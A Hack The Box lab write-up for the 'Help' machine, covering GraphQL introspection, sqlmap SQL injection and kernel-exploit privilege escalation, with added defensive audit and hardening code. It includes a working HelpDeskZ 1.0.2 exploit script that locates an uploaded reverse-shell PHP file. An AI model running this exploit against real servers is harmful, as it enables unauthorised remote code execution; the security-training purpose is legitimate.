Help - Hack The Box
Enumeration
Nmap
The initial Nmap scan revealed that SSH, HTTP and a second HTTP service on port 3000 were open.
WEB Enumeration
When I visited the website, it forwarded me to help.htb, so I added that name to the /etc/hosts file.
Then I applied directory brute forcing and found an endpoint named support, where a HelpDeskZ site was hosted.
I tried brute forcing default credentials and found nothing. Then I brute forced version files and found README.md, which revealed the HelpDeskZ version.
This version was vulnerable to both authenticated SQL injection and unauthenticated file upload leading to RCE. I tried the RCE first, but it did not work.
Later, I visited the website on port 3000. It showed a message.
I brute forced API endpoints and found out it was a GraphQL API.
Then I ran basic GraphQL queries to understand how the site works and what the parameters are.
Later, I captured the request with Burp Suite and ran a full introspection query.
Then, using graphql-visualizer, I extracted the GraphQL API map.
After learning that the schema includes a User record with username and password fields, I simply queried it and got the password.
Then I cracked the password.
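The introspection step above is exactly what a defender can run against their own API before an attacker does. The following audit script is an added example and is not part of the original writeup or of the target application: it sends no traffic, but parses a constructed introspection response (the SAMPLE_INTROSPECTION JSON below is made up to mirror the shape of a real __schema answer) and flags user-defined fields whose names suggest credentials, such as the User.password field the writeup found. The INTROSPECTION_QUERY constant is the standard query shape; field names and types in the sample are assumptions.

```python
import json

# The standard introspection query (the same kind of request the writeup sent from Burp).
INTROSPECTION_QUERY = """
query {
  __schema {
    types {
      name
      kind
      fields { name type { name kind ofType { name kind ofType { name kind } } } }
    }
  }
}
"""

# Field names that should never be readable through a public API.
SENSITIVE_WORDS = ("password", "passwd", "secret", "token", "hash", "salt", "apikey", "api_key")

# Constructed sample response: a trimmed introspection result with one User type that
# exposes a password field. Made up for this example, not captured from the box.
SAMPLE_INTROSPECTION = json.dumps({"data": {"__schema": {"types": [
    {"name": "Query", "kind": "OBJECT", "fields": [
        {"name": "user", "type": {"name": None, "kind": "LIST",
            "ofType": {"name": "User", "kind": "OBJECT", "ofType": None}}}]},
    {"name": "User", "kind": "OBJECT", "fields": [
        {"name": "id", "type": {"name": "ID", "kind": "SCALAR", "ofType": None}},
        {"name": "username", "type": {"name": "String", "kind": "SCALAR", "ofType": None}},
        {"name": "password", "type": {"name": None, "kind": "NON_NULL",
            "ofType": {"name": "String", "kind": "SCALAR", "ofType": None}}}]},
    {"name": "String", "kind": "SCALAR", "fields": None},
    {"name": "__Schema", "kind": "OBJECT", "fields": [
        {"name": "types", "type": {"name": None, "kind": "LIST",
            "ofType": {"name": "__Type", "kind": "OBJECT", "ofType": None}}}]},
]}}})


def introspection_enabled(response_body):
    """True when the server answered the introspection query with a schema.
    A hardened production deployment returns an error here instead."""
    try:
        body = json.loads(response_body)
    except ValueError:
        return False
    schema = (body.get("data") or {}).get("__schema") or {}
    return "types" in schema


def named_type(type_ref):
    """Unwrap NON_NULL and LIST wrappers down to the named type."""
    while type_ref and type_ref.get("name") is None and type_ref.get("ofType"):
        type_ref = type_ref["ofType"]
    return (type_ref or {}).get("name")


def audit_schema(response_body):
    """Return (type, field, field_type) for every user-defined field whose name
    suggests a credential or secret. Introspection types (prefixed __) are skipped."""
    types = json.loads(response_body)["data"]["__schema"]["types"]
    findings = []
    for gql_type in types:
        if gql_type["name"].startswith("__") or not gql_type.get("fields"):
            continue
        for field in gql_type["fields"]:
            lowered = field["name"].lower()
            if any(word in lowered for word in SENSITIVE_WORDS):
                findings.append((gql_type["name"], field["name"], named_type(field["type"])))
    return findings


if __name__ == "__main__":
    if introspection_enabled(SAMPLE_INTROSPECTION):
        print("introspection is enabled; review the schema before exposing it")
    for type_name, field_name, field_type in audit_schema(SAMPLE_INTROSPECTION):
        print("exposed credential field: %s.%s (%s)" % (type_name, field_name, field_type))
```

Two separate fixes follow from the findings: disabling introspection in production removes the map the writeup relied on, but only the removal of the password field from the User type (or from the resolver that serves it) removes the data itself, since a field can still be queried by name with introspection switched off.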
Exploitation
1st Way SQL Injection
This version of HelpDeskZ was vulnerable to authenticated SQL injection. There was an exploit-db exploit, but it was old and not working, so I read it to understand how the exploit works and tested it myself.
Then I built an sqlmap command and dumped the whole database. The staff table included the Administrator account and its password.
Then I tried some usernames such as Administrator, admin, helpme, support and help; help worked. I logged in and got the user flag.
2nd Way Unauthenticated RCE
After some research, I found out the RCE was not working because I was not in the same time zone as the target machine. Later I found this repo and updated the code as below:
import hashlib
import time, calendar
import sys
import requests

print('HelpDesk v1.0.2 - Unauthenticated shell upload')
if len(sys.argv) < 3:
    print("Usage: {} http://helpdeskz.com/support/uploads/tickets/ Reverse-shell.php".format(sys.argv[0]))
    sys.exit(1)
helpdeskzBaseUrl = sys.argv[1]
fileName = sys.argv[2]
# Getting the time from the server's Date header instead of the local clock
response = requests.head('http://help.htb/support/')
serverTime = response.headers['Date']
# Setting the time in epoch seconds (timegm treats the parsed value as UTC)
FormatTime = '%a, %d %b %Y %H:%M:%S %Z'
currentTime = int(calendar.timegm(time.strptime(serverTime, FormatTime)))
# Walk back over the previous 20 minutes, one candidate timestamp per second
for x in range(0, 20*60):
    plaintext = fileName + str(currentTime - x)
    md5hash = hashlib.md5(plaintext.encode()).hexdigest()
    url = helpdeskzBaseUrl + md5hash + '.php'
    response = requests.head(url)
    if response.status_code == 200:
        print("found!")
        print(url)
        sys.exit(0)
print("Sorry, I did not find anything")
The main update is getting the date and time from http://help.htb/support/ and querying from the current time back to 20 minutes earlier. Running this script worked, and I got remote code execution.
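The root cause the script exploits is that the stored file name is derived entirely from guessable inputs (the original file name and the upload second) and keeps the caller-chosen extension, so a 20 minute window is only 1200 candidates. The following is an added example, not the writeup's or HelpDeskZ's code: it puts that naming scheme next to a hardened one (random name from the OS CSPRNG, extension allowlist, storage outside the document root) and includes an offline audit helper that tells you whether a stored name is recoverable by the writeup's method. The directory paths and allowed extensions are assumptions for illustration.

```python
import hashlib
import os
import secrets

# Assumed paths for illustration only (not taken from the box or from HelpDeskZ).
WEB_UPLOAD_DIR = "/var/www/support/uploads/tickets"   # served directly by the web server
PRIVATE_UPLOAD_DIR = "/var/lib/support/attachments"   # not reachable over HTTP
ALLOWED_EXTENSIONS = {".txt", ".png", ".jpg", ".pdf"}  # assumed allowlist for ticket attachments


def predictable_name(filename, epoch_seconds):
    """The weak scheme the writeup reverse engineered: md5(original name + upload time),
    keeping whatever extension the uploader supplied. Every input is guessable."""
    ext = os.path.splitext(filename)[1]
    digest = hashlib.md5((filename + str(int(epoch_seconds))).encode()).hexdigest()
    return digest + ext


def extension_allowed(filename):
    """Allowlist check: anything the web server could execute is simply not in the set."""
    return os.path.splitext(filename)[1].lower() in ALLOWED_EXTENSIONS


def hardened_name(filename):
    """Unguessable name: 128 random bits from the OS CSPRNG, extension checked against
    the allowlist, and no dependence on the original name or the clock."""
    if not extension_allowed(filename):
        raise ValueError("extension not allowed: %r" % os.path.splitext(filename)[1])
    return secrets.token_hex(16) + os.path.splitext(filename)[1].lower()


def storage_path(stored_name, private=True):
    """Keep attachments outside the document root and hand them out through an
    authenticated download handler, so a correct name alone yields nothing."""
    base = PRIVATE_UPLOAD_DIR if private else WEB_UPLOAD_DIR
    return os.path.join(base, stored_name)


def is_guessable(stored_name, filename, observed_epoch, window_seconds=20 * 60):
    """Audit helper: does this stored name match the predictable scheme for any second
    in the window before observed_epoch? True means the naming leaks the file."""
    return any(predictable_name(filename, observed_epoch - i) == stored_name
               for i in range(window_seconds))


if __name__ == "__main__":
    weak = predictable_name("note.txt", 1500000000)
    strong = hardened_name("note.txt")
    print("weak  :", weak, "guessable:", is_guessable(weak, "note.txt", 1500000300))
    print("strong:", strong, "guessable:", is_guessable(strong, "note.txt", 1500000300))
    print("stored at:", storage_path(strong))
```

Note that the server's Date header is not the weakness: HTTP responses are expected to carry it, and an attacker who cannot read it still has a good estimate of the upload time from their own clock. The fix is randomness the attacker cannot reconstruct plus a stored location the web server never executes from.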
Privilege Escalation
I tried some methods which did not work. Later, I ran linpeas and found out that the kernel was exploitable.
At first I tried DirtyCow, but it did not work. Later, I tried CVE-2017-16995 and got root.
Pwned
The machine was fully compromised.